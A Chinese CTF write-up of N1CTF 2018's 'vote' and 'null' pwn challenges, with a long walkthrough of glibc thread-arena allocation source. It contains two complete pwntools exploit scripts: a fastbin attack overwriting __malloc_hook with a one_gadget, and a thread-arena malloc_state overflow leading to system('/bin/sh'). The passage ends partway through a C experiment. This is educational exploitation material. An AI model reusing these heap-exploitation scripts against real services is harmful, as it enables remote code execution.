N1CTF 2018 && 线程堆知识源代码分析

Nu1L队组织的一场国际赛,涉及的知识面很广,仅记录PWN题的第一道和第二道。

vote

一道比较常规套路的fastbin利用方法,主要涉及的知识是fastbin堆块的劫持。

题目分析

题目是一个投票系统,主要包括5个函数:

涉及的数据结构是投票者的票数和名字:

1
2
3
4
0             8                16                 ...
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| number | time | name ......... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

这里的投票函数实现的很诡异,创建了一个新的线程,线程利用一个bss段上的变量传递线程参数,sleep 等待3s开始投票,出现一个问题,当在3s内有另外的投票时,会造成竞争条件,使第一人的票数投到第二人上。

说到诡异,这个取消函数就更诡异了,显然里面有一个UAF以及double free漏洞:

漏洞利用

地址泄露

利用UAF漏洞,首先申请一个超过global_max_fast的漏洞,这样在释放时,堆块会放到unsorted bin中,在unsorted bin的组织结构中,堆块的fd、bk指针会填充为main_arena+88这个地址,因而泄露了libc的地址。注意防止释放时被top块合并就好了。

Fastbin劫持

同样还是利用UAF漏洞,fastbin是一个单链表结构,当可以控制一个堆块的fd指针的时候基本就可以实现任意地址分配。

首先,分配两个大小为0x70 的堆块,并且顺序释放,这样在fastbin中会形成单链表结构,单链表的第二块指向第一块的堆头。

这里的一个比较新的点是,这题的数据结构无法直接修改fd指针,但是由于UAF漏洞,当对一个已释放用户投票时,仍然修改了堆块的fd指针,理论上可以指向任意位置。

这里我选择将fd指针指向原位置+0x20的地址,因为这个地方可以编辑(上一个用户的name字段),因而伪造一个堆块,就可以再将fastbin劫持到其他地方,选择将堆块劫持到 __malloc_hook - 0x23的位置,这个位置是非页对齐的,但是在分配地址时并不检测,而且在libc 2.23库中,此处存在多个libc地址,当非页对齐看时,此处就有一个0x7f,恰好可绕过fastbin的size检测,另外还有一个malloc_assert检测,非常恰巧的一个值。

当可以控制__malloc_hook,将其覆盖为one_gadget,就可以直接通过malloc新的堆块来得到shell了。

解题脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
from pwn import *

import time,base64
debug=0
elf = ELF('./vote')
if debug:
p= process('./vote')
context.log_level = 'debug'
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#gdb.attach(p)#,'b*0x0400F6D'
else:
p = remote('47.90.103.10',6000)#process('./pwn1')
libc = ELF('./libc-2.23.so')

def add(size,name):
p.recvuntil('Action:')
p.sendline('0')
p.recvuntil('size')
p.sendline(str(size))
p.recvuntil('name:')
p.sendline(name)
def show(index):
p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('index')
p.sendline(str(index))

def vote(index):
p.recvuntil('Action:')
p.sendline('2')
p.recvuntil('index')
p.sendline(str(index))

def cancel(index):
p.recvuntil('Action:')
p.sendline('4')
p.recvuntil('index')
p.sendline(str(index))

add(0x3e0,'p4nda') #0
add(555,'p4nda') #1
cancel(0)
show(0)
p.recvuntil('count: ')
leak = int(p.recvline()[:-1])
libc.address = leak - 88 - 0x10 - libc.symbols['__malloc_hook']
print '[+] ', hex(leak)
print '[+] system :',hex(libc.symbols['system'])
add(0x50,p64(0x71)+p64(0x71)+p64(libc.symbols['__malloc_hook']-0x23) )#2
add(0x50,'p4nda' )#3
#add(555,'p4nda') #4
cancel(2)
cancel(3)
for i in range(32):
vote(3)
add(0x50,'p4nda' )#5
add(0x50,'p4nda' )#6
add(0x50,'p4n'+p64(libc.address + 0xf0274))#0xf02a4))#6


p.recvuntil('Action:')
p.sendline('0')
p.recvuntil('size')
p.sendline(str(0x50))
p.interactive()

'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf0274 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1117 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''

null

涉及到线程堆块的分配,看了两天源代码,尽管出题人说是 a relatively easy task

还是记录一下线程堆块分配的姿势。

线程堆块分配

名词解释

分配区 个人理解分配区是分配内存必要的分配结构,分为主分配区和非主分配区,主分配区利用sbrk等函数分配,地址是连续的;非主分配区是不连续的,因此需要组织多个子堆块(sub-heap),对应到下面的数据结构,每一个分配区对应一个malloc_state,每一个子堆块对应一个_heap_info。分配区的数量是一定的,与操作系统位数和CPU核数有关

1
2
3
4
For 32 bit systems:
Number of arena = 2 * number of cores + 1.
For 64 bit systems:
Number of arena = 8 * number of cores + 1.

锁是一个普通的变量,需要使用特殊的函数加锁解锁,为了进程间进行同步,防止发生竞争条件。

数据结构

  1. _heap_info

    仅存在于线程堆块里的数据结构,主要是标记当前sub_heap的数据信息,在线程里可以存在多个。

    主要原因是 :一个程序(进程)中可以包含多个进程,而各个进程的地址空间是共享的,主要就造成了其地址冲突。当主线程要求使用sbrk函数来保证堆空间是连续的时,那子线程智能使用mmap来分配堆空间。这样一来,由于mmap分配的特点,导致了线程分配的堆块是以块为单位的,如果某线程需要的堆块多的话,进程空间是不足的,再次使用mmap来分配heap时,二者并不连续,所以需要这样的数据结构来标识该块的所属和一些内存信息。

    该sub_heap数据结构是单链表形式保存的,其_heap_info保存了前一个sub_heap的位置。

1
2
3
4
5
6
7
8
9
10
11
12
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-6 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
  1. malloc_state

    对于进程堆有一些了解的同学对这个数据结构会很熟悉,一个非常常见的结构体是保存在libc库bss段的main_arena,这是主线程堆是唯一的,所以为了方便,在libc中加入了一个全局变量,而这个数据结构的目的是为了组织堆空间,如fastbin、unsorted bin、top链表的组织等等。

    每一个线程有唯一 的malloc_state数据结构,即thread arena。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    struct malloc_state
    {
    /* Serialize access. */
    mutex_t mutex;

    /* Flags (formerly in max_fast). */
    int flags;

    /* Fastbins */
    mfastbinptr fastbinsY[NFASTBINS];

    /* Base of the topmost chunk -- not otherwise kept in a bin */
    mchunkptr top;

    /* The remainder from the most recent split of a small request */
    mchunkptr last_remainder;

    /* Normal bins packed as described above */
    mchunkptr bins[NBINS * 2 - 2];

    /* Bitmap of bins */
    unsigned int binmap[BINMAPSIZE];

    /* Linked list */
    struct malloc_state *next;

    /* Linked list for free arenas. */
    struct malloc_state *next_free;

    /* Memory allocated from the system in this arena. */
    INTERNAL_SIZE_T system_mem;
    INTERNAL_SIZE_T max_system_mem;
    };

    结构组织

    1. 分配区的获取

      可以先从malloc的代码出发,一步一步寻找分配区的生成与线程获取。首先是__libc_malloc函数

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      void *
      __libc_malloc (size_t bytes)
      {
      mstate ar_ptr;
      void *victim;

      void *(*hook) (size_t, const void *)
      = atomic_forced_read (__malloc_hook);
      if (__builtin_expect (hook != NULL, 0))
      return (*hook)(bytes, RETURN_ADDRESS (0));

      arena_get (ar_ptr, bytes);

      victim = _int_malloc (ar_ptr, bytes);
      /* Retry with another arena only if we were able to find a usable arena
      before. */
      if (!victim && ar_ptr != NULL)
      {
      LIBC_PROBE (memory_malloc_retry, 1, bytes);
      ar_ptr = arena_get_retry (ar_ptr, bytes);
      victim = _int_malloc (ar_ptr, bytes);
      }

      if (ar_ptr != NULL)
      (void) mutex_unlock (&ar_ptr->mutex);

      assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
      ar_ptr == arena_for_chunk (mem2chunk (victim)));
      return victim;
      }
      libc_hidden_def (__libc_malloc)

      malloc函数可以大致分为四部分,首先是__malloc_hook函数的检测与执行;接下来是arena_get,也就是分配区的获取;然后是_int_malloc,这个是堆块分配的主要逻辑,也是我们比较熟悉的如fastbin、unsorted bin的组织流程,它的返回值就是拟分配的堆块;最后是对拟分配堆块的一些检测。

      跟踪一下arena_get函数,这是一个宏定义函数,其中,thread_arena变量是线程的全局变量,标志着最近使用过的分配区结构

      1
      2
      3
      4
      #define arena_get(ptr, size) do { \
      ptr = thread_arena; \
      arena_lock (ptr, size); \
      } while (0)

      继续跟踪arena_lock函数,这也是一个宏定义函数。首先,当线程曾经拥有过分配区,会尝试对该分配区加速并使用,否则执行arena_get2函数。

      1
      2
      3
      4
      5
      6
      #define arena_lock(ptr, size) do {					      \
      if (ptr && !arena_is_corrupt (ptr)) \
      (void) mutex_lock (&ptr->mutex); \
      else \
      ptr = arena_get2 ((size), NULL); \
      } while (0)

      由于我们要寻找该分配区的初始化,所以继续跟踪arena_get2:

      首先,arena_get2函数调用了get_free_list()函数,猜测应该返回一个空或者一个分配区,如果成功返回了一个分配区,就直接结束;当未找到可用的分配区,就进入下面的逻辑:首先查看narenas_limit变量,应该是对于分配区个数的限制,当未初始化时,会根据内核数量及mp_areana_max进行计算。

      narenas是当前分配区的个数,当不超过分配区个数时,会调用_int_new_arena生成新的分配区,否则调用reused_arena来等待服用分配区。

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      arena_get2 (size_t size, mstate avoid_arena)
      {
      mstate a;

      static size_t narenas_limit;

      a = get_free_list ();
      if (a == NULL)
      {
      /* Nothing immediately available, so generate a new arena. */
      if (narenas_limit == 0)
      {
      if (mp_.arena_max != 0)
      narenas_limit = mp_.arena_max;
      else if (narenas > mp_.arena_test)
      {
      int n = __get_nprocs ();

      if (n >= 1)
      narenas_limit = NARENAS_FROM_NCORES (n);
      else
      /* We have no information about the system. Assume two
      cores. */
      narenas_limit = NARENAS_FROM_NCORES (2);
      }
      }
      repeat:;
      size_t n = narenas;
      /* NB: the following depends on the fact that (size_t)0 - 1 is a
      very large number and that the underflow is OK. If arena_max
      is set the value of arena_test is irrelevant. If arena_test
      is set but narenas is not yet larger or equal to arena_test
      narenas_limit is 0. There is no possibility for narenas to
      be too big for the test to always fail since there is not
      enough address space to create that many arenas. */
      if (__glibc_unlikely (n <= narenas_limit - 1))
      {
      if (catomic_compare_and_exchange_bool_acq (&narenas, n + 1, n))
      goto repeat;
      a = _int_new_arena (size);
      if (__glibc_unlikely (a == NULL))
      catomic_decrement (&narenas);
      }
      else
      a = reused_arena (avoid_arena);
      }
      return a;
      }

      先跟踪get_free_list函数,free_list也是一个全局变量,用于标识下一个可用的分配区,逻辑十分简单,当获取到的free_list不为空,就替换了当前线程保存的分配区,并对该分配区加锁,否则返回NULL。

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      static mstate
      get_free_list (void)
      {
      mstate replaced_arena = thread_arena;
      mstate result = free_list;
      if (result != NULL)
      {
      (void) mutex_lock (&free_list_lock);
      result = free_list;
      if (result != NULL)
      {
      free_list = result->next_free;

      /* The arena will be attached to this thread. */
      ++result->attached_threads;

      detach_arena (replaced_arena);
      }
      (void) mutex_unlock (&free_list_lock);

      if (result != NULL)
      {
      LIBC_PROBE (memory_arena_reuse_free_list, 1, result);
      (void) mutex_lock (&result->mutex);
      thread_arena = result;
      }
      }

      return result;
      }

      再跟踪reused_arena,可以看到,程序维护了一个全局变量next_to_use,该变量初始值是&main_arena,当成功获取了一个分配区后,这个变量会指向下一个分配区,也就是说分配区的使用是平均和循环的,这也避免了一个分配区被重复使用多次。

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      static mstate
      reused_arena (mstate avoid_arena)
      {
      mstate result;
      /* FIXME: Access to next_to_use suffers from data races. */
      static mstate next_to_use;
      if (next_to_use == NULL)
      next_to_use = &main_arena;

      /* Iterate over all arenas (including those linked from
      free_list). */
      result = next_to_use;
      do
      {
      if (!arena_is_corrupt (result) && !mutex_trylock (&result->mutex))
      goto out;

      /* FIXME: This is a data race, see _int_new_arena. */
      result = result->next;
      }
      while (result != next_to_use);

      /* Avoid AVOID_ARENA as we have already failed to allocate memory
      in that arena and it is currently locked. */
      if (result == avoid_arena)
      result = result->next;

      /* Make sure that the arena we get is not corrupted. */
      mstate begin = result;
      while (arena_is_corrupt (result) || result == avoid_arena)
      {
      result = result->next;
      if (result == begin)
      break;
      }

      /* We could not find any arena that was either not corrupted or not the one
      we wanted to avoid. */
      if (result == begin || result == avoid_arena)
      return NULL;

      /* No arena available without contention. Wait for the next in line. */
      LIBC_PROBE (memory_arena_reuse_wait, 3, &result->mutex, result, avoid_arena);
      (void) mutex_lock (&result->mutex);

      out:
      /* Attach the arena to the current thread. Note that we may have
      selected an arena which was on free_list. */
      {
      /* Update the arena thread attachment counters. */
      mstate replaced_arena = thread_arena;
      (void) mutex_lock (&free_list_lock);
      detach_arena (replaced_arena);
      ++result->attached_threads;
      (void) mutex_unlock (&free_list_lock);
      }

      LIBC_PROBE (memory_arena_reuse, 2, result, avoid_arena);
      thread_arena = result;
      next_to_use = result->next;

      return result;
      }

      最后,分析一下一个新分配区的生成函数_int_new_arena。首先调用了new_heap函数来申请新的内存,可以看到,当获得内存后,该内存的第一块是heap_info结构,接下来设置了malloc_state结构和top头。

      至此,一个新的分配区生成完毕。

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      static mstate
      _int_new_arena (size_t size)
      {
      mstate a;
      heap_info *h;
      char *ptr;
      unsigned long misalign;

      h = new_heap (size + (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT),
      mp_.top_pad);
      if (!h)
      {
      /* Maybe size is too large to fit in a single heap. So, just try
      to create a minimally-sized arena and let _int_malloc() attempt
      to deal with the large request via mmap_chunk(). */
      h = new_heap (sizeof (*h) + sizeof (*a) + MALLOC_ALIGNMENT, mp_.top_pad);
      if (!h)
      return 0;
      }
      a = h->ar_ptr = (mstate) (h + 1);
      malloc_init_state (a);
      a->attached_threads = 1;
      /*a->next = NULL;*/
      a->system_mem = a->max_system_mem = h->size;
      arena_mem += h->size;

      /* Set up the top chunk, with proper alignment. */
      ptr = (char *) (a + 1);
      misalign = (unsigned long) chunk2mem (ptr) & MALLOC_ALIGN_MASK;
      if (misalign > 0)
      ptr += MALLOC_ALIGNMENT - misalign;
      top (a) = (mchunkptr) ptr;
      set_head (top (a), (((char *) h + h->size) - ptr) | PREV_INUSE);

      LIBC_PROBE (memory_arena_new, 2, a, size);
      mstate replaced_arena = thread_arena;
      thread_arena = a;
      mutex_init (&a->mutex);

      (void) mutex_lock (&list_lock);

      /* Add the new arena to the global list. */
      a->next = main_arena.next;
      /* FIXME: The barrier is an attempt to synchronize with read access
      in reused_arena, which does not acquire list_lock while
      traversing the list. */
      atomic_write_barrier ();
      main_arena.next = a;

      (void) mutex_unlock (&list_lock);

      (void) mutex_lock (&free_list_lock);
      detach_arena (replaced_arena);
      (void) mutex_unlock (&free_list_lock);

      /* Lock this arena. NB: Another thread may have been attached to
      this arena because the arena is now accessible from the
      main_arena.next list and could have been picked by reused_arena.
      This can only happen for the last arena created (before the arena
      limit is reached). At this point, some arena has to be attached
      to two threads. We could acquire the arena lock before list_lock
      to make it less likely that reused_arena picks this new arena,
      but this could result in a deadlock with ptmalloc_lock_all. */

      (void) mutex_lock (&a->mutex);

      return a;
      }

      最后再追踪一下new_heap这个申请内存的函数。全局变量 aligned_heap_area 是上一次调用 mmap 分配内存的结束虚拟地址,并已经按照 HEAP_MAX_SIZE 大小对齐。如果 aligned_heap_area 不为空,尝试从上次映射结束地址开始映射大小为 HEAP_MAX_SIZE 的内存块, 由于全局变量 aligned_heap_area 没有锁保护,可能存在多个线程同时 mmap()函数从 aligned_heap_area 开始映射新的虚拟内存块,操作系统会保证只会有一个线程会成功,其它在同一地址映射新虚拟内存块都会失败。 无论映射是否成功,都将全局变量 aligned_heap_area 设置为 NULL。如果映射成功,但返回的虚拟地址不是按HEAP_MAX_SIZE 大小对齐的,取消该区域的映射,映射失败。

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      static heap_info *
      internal_function
      new_heap (size_t size, size_t top_pad)
      {
      size_t pagesize = GLRO (dl_pagesize);
      char *p1, *p2;
      unsigned long ul;
      heap_info *h;

      if (size + top_pad < HEAP_MIN_SIZE)
      size = HEAP_MIN_SIZE;
      else if (size + top_pad <= HEAP_MAX_SIZE)
      size += top_pad;
      else if (size > HEAP_MAX_SIZE)
      return 0;
      else
      size = HEAP_MAX_SIZE;
      size = ALIGN_UP (size, pagesize);

      /* A memory region aligned to a multiple of HEAP_MAX_SIZE is needed.
      No swap space needs to be reserved for the following large
      mapping (on Linux, this is the case for all non-writable mappings
      anyway). */
      p2 = MAP_FAILED;
      if (aligned_heap_area)
      {
      p2 = (char *) MMAP (aligned_heap_area, HEAP_MAX_SIZE, PROT_NONE,
      MAP_NORESERVE);
      aligned_heap_area = NULL;
      if (p2 != MAP_FAILED && ((unsigned long) p2 & (HEAP_MAX_SIZE - 1)))
      {
      __munmap (p2, HEAP_MAX_SIZE);
      p2 = MAP_FAILED;
      }
      }
      if (p2 == MAP_FAILED)
      {
      p1 = (char *) MMAP (0, HEAP_MAX_SIZE << 1, PROT_NONE, MAP_NORESERVE);
      if (p1 != MAP_FAILED)
      {
      p2 = (char *) (((unsigned long) p1 + (HEAP_MAX_SIZE - 1))
      & ~(HEAP_MAX_SIZE - 1));
      ul = p2 - p1;
      if (ul)
      __munmap (p1, ul);
      else
      aligned_heap_area = p2 + HEAP_MAX_SIZE;
      __munmap (p2 + HEAP_MAX_SIZE, HEAP_MAX_SIZE - ul);
      }
      else
      {
      /* Try to take the chance that an allocation of only HEAP_MAX_SIZE
      is already aligned. */
      p2 = (char *) MMAP (0, HEAP_MAX_SIZE, PROT_NONE, MAP_NORESERVE);
      if (p2 == MAP_FAILED)
      return 0;

      if ((unsigned long) p2 & (HEAP_MAX_SIZE - 1))
      {
      __munmap (p2, HEAP_MAX_SIZE);
      return 0;
      }
      }
      }
      if (__mprotect (p2, size, PROT_READ | PROT_WRITE) != 0)
      {
      __munmap (p2, HEAP_MAX_SIZE);
      return 0;
      }
      h = (heap_info *) p2;
      h->size = size;
      h->mprotect_size = size;
      LIBC_PROBE (memory_heap_new, 2, h, h->size);
      return h;
      }
      1. 分配区的补充

        在malloc获取较大内存空间,导致top用尽时,根据需求会扩大top块的容量。而对于非主分配区,扩大top在一定情况下是获得连续内存的,这就显示出了sub_heap的用途。跟踪一下int_malloc函数,在malloc函数的最后,有这样的代码,当申请的内存,top头无法满足时,会对fastbin进行释放操作,当仍无法满足时,会调用sysmalloc进行补充。

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
             ...
        if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
        {
        remainder_size = size - nb;
        remainder = chunk_at_offset (victim, nb);
        av->top = remainder;
        set_head (victim, nb | PREV_INUSE |
        (av != &main_arena ? NON_MAIN_ARENA : 0));
        set_head (remainder, remainder_size | PREV_INUSE);

        check_malloced_chunk (av, victim, nb);
        void *p = chunk2mem (victim);
        alloc_perturb (p, bytes);
        return p;
        }

        /* When we are using atomic ops to free fast chunks we can get
        here for all block sizes. */
        else if (have_fastchunks (av))
        {
        malloc_consolidate (av);
        /* restore original bin index */
        if (in_smallbin_range (nb))
        idx = smallbin_index (nb);
        else
        idx = largebin_index (nb);
        }

        /*
        Otherwise, relay to handle system-dependent cases
        */
        else
        {
        void *p = sysmalloc (nb, av);
        if (p != NULL)
        alloc_perturb (p, bytes);
        return p;
        }
        ...

        追踪sysmalloc代码,代码过长,截取非主分配区部分。当申请的堆小于mmap直接分配阈值,并且分配区是非主分配区时,首先尝试延长原有的heap长度(连续分配);当长度不满足需求时,会重新分配一块sub_heap,并设置heap_info值,也就是利用mmap随机在内存中申请一块内存,这块内存位于刚刚分配的低地址位置。

        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21

        static void *
        sysmalloc (INTERNAL_SIZE_T nb, mstate av)
        {
        mchunkptr old_top; /* incoming value of av->top */
        INTERNAL_SIZE_T old_size; /* its size */
        char *old_end; /* its end address */

        long size; /* arg to first MORECORE or mmap call */
        char *brk; /* return value from MORECORE */

        long correction; /* arg to 2nd MORECORE call */
        char *snd_brk; /* 2nd return val */

        INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
        INTERNAL_SIZE_T end_misalign; /* partial page left at end of new space */
        char *aligned_brk; /* aligned offset into brk */

        mchunkptr p; /* the allocated/returned chunk */
        mchunkptr remainder; /* remainder from allocation */
        unsigned long remainder_size; /* its size */

        size_t pagesize = GLRO (dl_pagesize);
        bool tried_mmap = false;

     /*
        If have mmap, and the request size meets the mmap threshold, and
        the system supports mmap, and there are few enough currently
        allocated mmapped regions, try to directly map this request
        rather than expanding top.
      */

     if (av == NULL
         || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
         && (mp_.n_mmaps < mp_.n_mmaps_max)))
       {
         ...
         }

     if (av != &main_arena)
       {
         heap_info *old_heap, *heap;
         size_t old_heap_size;

         /* First try to extend the current heap. */
         old_heap = heap_for_ptr (old_top);
         old_heap_size = old_heap->size;
         if ((long) (MINSIZE + nb - old_size) > 0
             && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
           {
             av->system_mem += old_heap->size - old_heap_size;
             arena_mem += old_heap->size - old_heap_size;
             set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
                       | PREV_INUSE);
           }
         else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
           {
             /* Use a newly allocated heap.  */
             heap->ar_ptr = av;
             heap->prev = old_heap;
             av->system_mem += heap->size;
             arena_mem += heap->size;
             /* Set up the new top.  */
             top (av) = chunk_at_offset (heap, sizeof (*heap));
             set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);

             /* Setup fencepost and free the old top chunk with a multiple of
                MALLOC_ALIGNMENT in size. */
             /* The fencepost takes at least MINSIZE bytes, because it might
                become the top chunk again later.  Note that a footer is set
                up, too, although the chunk is marked in use. */
             old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
             set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
             if (old_size >= MINSIZE)
               {
                 set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
                 set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
                 set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
                 _int_free (av, old_top, 1);
               }
             else
               {
                 set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
                 set_foot (old_top, (old_size + 2 * SIZE_SZ));
               }
           }
         else if (!tried_mmap)
           /* We can at least try to use to mmap memory.  */
           goto try_mmap;
       }
     else     /* av == main_arena */
       {
       ...
       }
   }

   
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
    
至此,线程堆的初始化、扩展、sub_heap生成全部完成。



## 题目分析

题目逻辑很简单,主函数什么都没有,只开启了一个线程。

![](/img/n1ctf2018/2-1.png)

在线程中,实现了用户输入任意大小的堆块、个数进行填充,并且可以对最后一个堆块赋值。

![](/img/n1ctf2018/2-3.png)

![](/img/n1ctf2018/2-2.png)

## 漏洞利用

漏洞存在于赋值函数中,是一个堆溢出函数,可以溢出和堆块大小等长的堆块。

![](/img/n1ctf2018/2-4.png)

该程序不存在地址泄露,并且system的地址也已经给出。

利用方法是利用上述线程堆块分配的知识。

1. 首先将线程第一次分配的非主分配区填充满

2. 再次申请时,线程只能申请一个新的sub_heap,此时的sub_heap地址位于第一次申请的sub_heap低地址位置。

3. 再次将该sub_heap填充满,在最后一次填充时进行复制,由于存在堆溢出,则可以溢出覆盖非主分配区的malloc_state结构体(thread arena),此时的利用和覆盖了main_arena的利用方法一致。

4. 选择fastbin attack的方法进行攻击,将fastbin劫持到bss段上去,因为bss段上有一个函数指针,会在赋值后调用,将这个函数赋值为system,并将堆块起始覆盖为'/bin/sh'即可获得shell。

**hint:**

1. 一定要劫持大小为0x70的fastbin链,因为可以利用bss段起始位置的STDIO file指针。

,与第一题的利用相同,都是0x7f。

2. 无法劫持top值达到任意分配,原因是无法过int_malloc最后的检测,感兴趣的同学可以踩踩这个坑。



## 解题脚本

```python
from pwn import *
import time
debug = 1
elf = ELF('./null')
if debug:
p = process('./null')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.log_level = 'debug'
else:
exit(0)



p.recvuntil('Enter secret password:')
p.send('i\'m ready for challenge\n')
time.sleep(3)

for i in range(0,3):
p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000-1))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000-1))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1000-1))
p.recvuntil('(0/1):')
p.sendline('0')

p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(90-1))
p.recvuntil('(0/1):')
p.sendline('0')


p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x4000))
p.recvuntil('blocks:')
p.sendline(str(1))
p.recvuntil('(0/1):')
p.sendline('1')
p.recvuntil('Input:')

p.send('/bin/sh\0'+p64(0)*(2+4+2+8+3-1))
padding = p64(0)*(0x4000/8-2-4-8-3) +p64(0)+ p64(0x11) + p64(0)*4 +p64(0) + p64(0)*5+p64(0x60201d)+ p64(0)*4 #p64(0x602028-4)
print hex(len(padding))
p.send(padding)
#gdb.attach(p,'info threads')
p.recvuntil('Action:')
p.sendline('1')
p.recvuntil('Size:')
p.sendline(str(0x60))
p.recvuntil('blocks:')
p.sendline(str(0))
p.recvuntil('(0/1):')
p.sendline('1')
p.recvuntil('Input:')
p.send('sh\0'+p64(0)+p64(0x400978)+p64(0)*(0x60/8))

p.interactive()
​ # 其他 1. 打完这次比赛,感觉和大佬们的差距无限大,还是要好好读书的。 2. 想到一个新的出题思路,既然程序的分配区是复用的,那么当一个程序的线程足够多的时候,主线程和某个线程所使用的分配区是一样的,在其他线程出现堆溢出的问题,同样可以影响主线程,比如如下的实验
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#include<stdio.h>
#include<stdlib.h>
#include<pthread.h>

static int num;
void *thread_func(){
char *a ;
a = malloc(0x80);
printf("[%d] malloc address %p\n",num++,a);
sleep(10);
}

int main(){
pthread_t tid[40];
int i;
void * ret;
char *a;
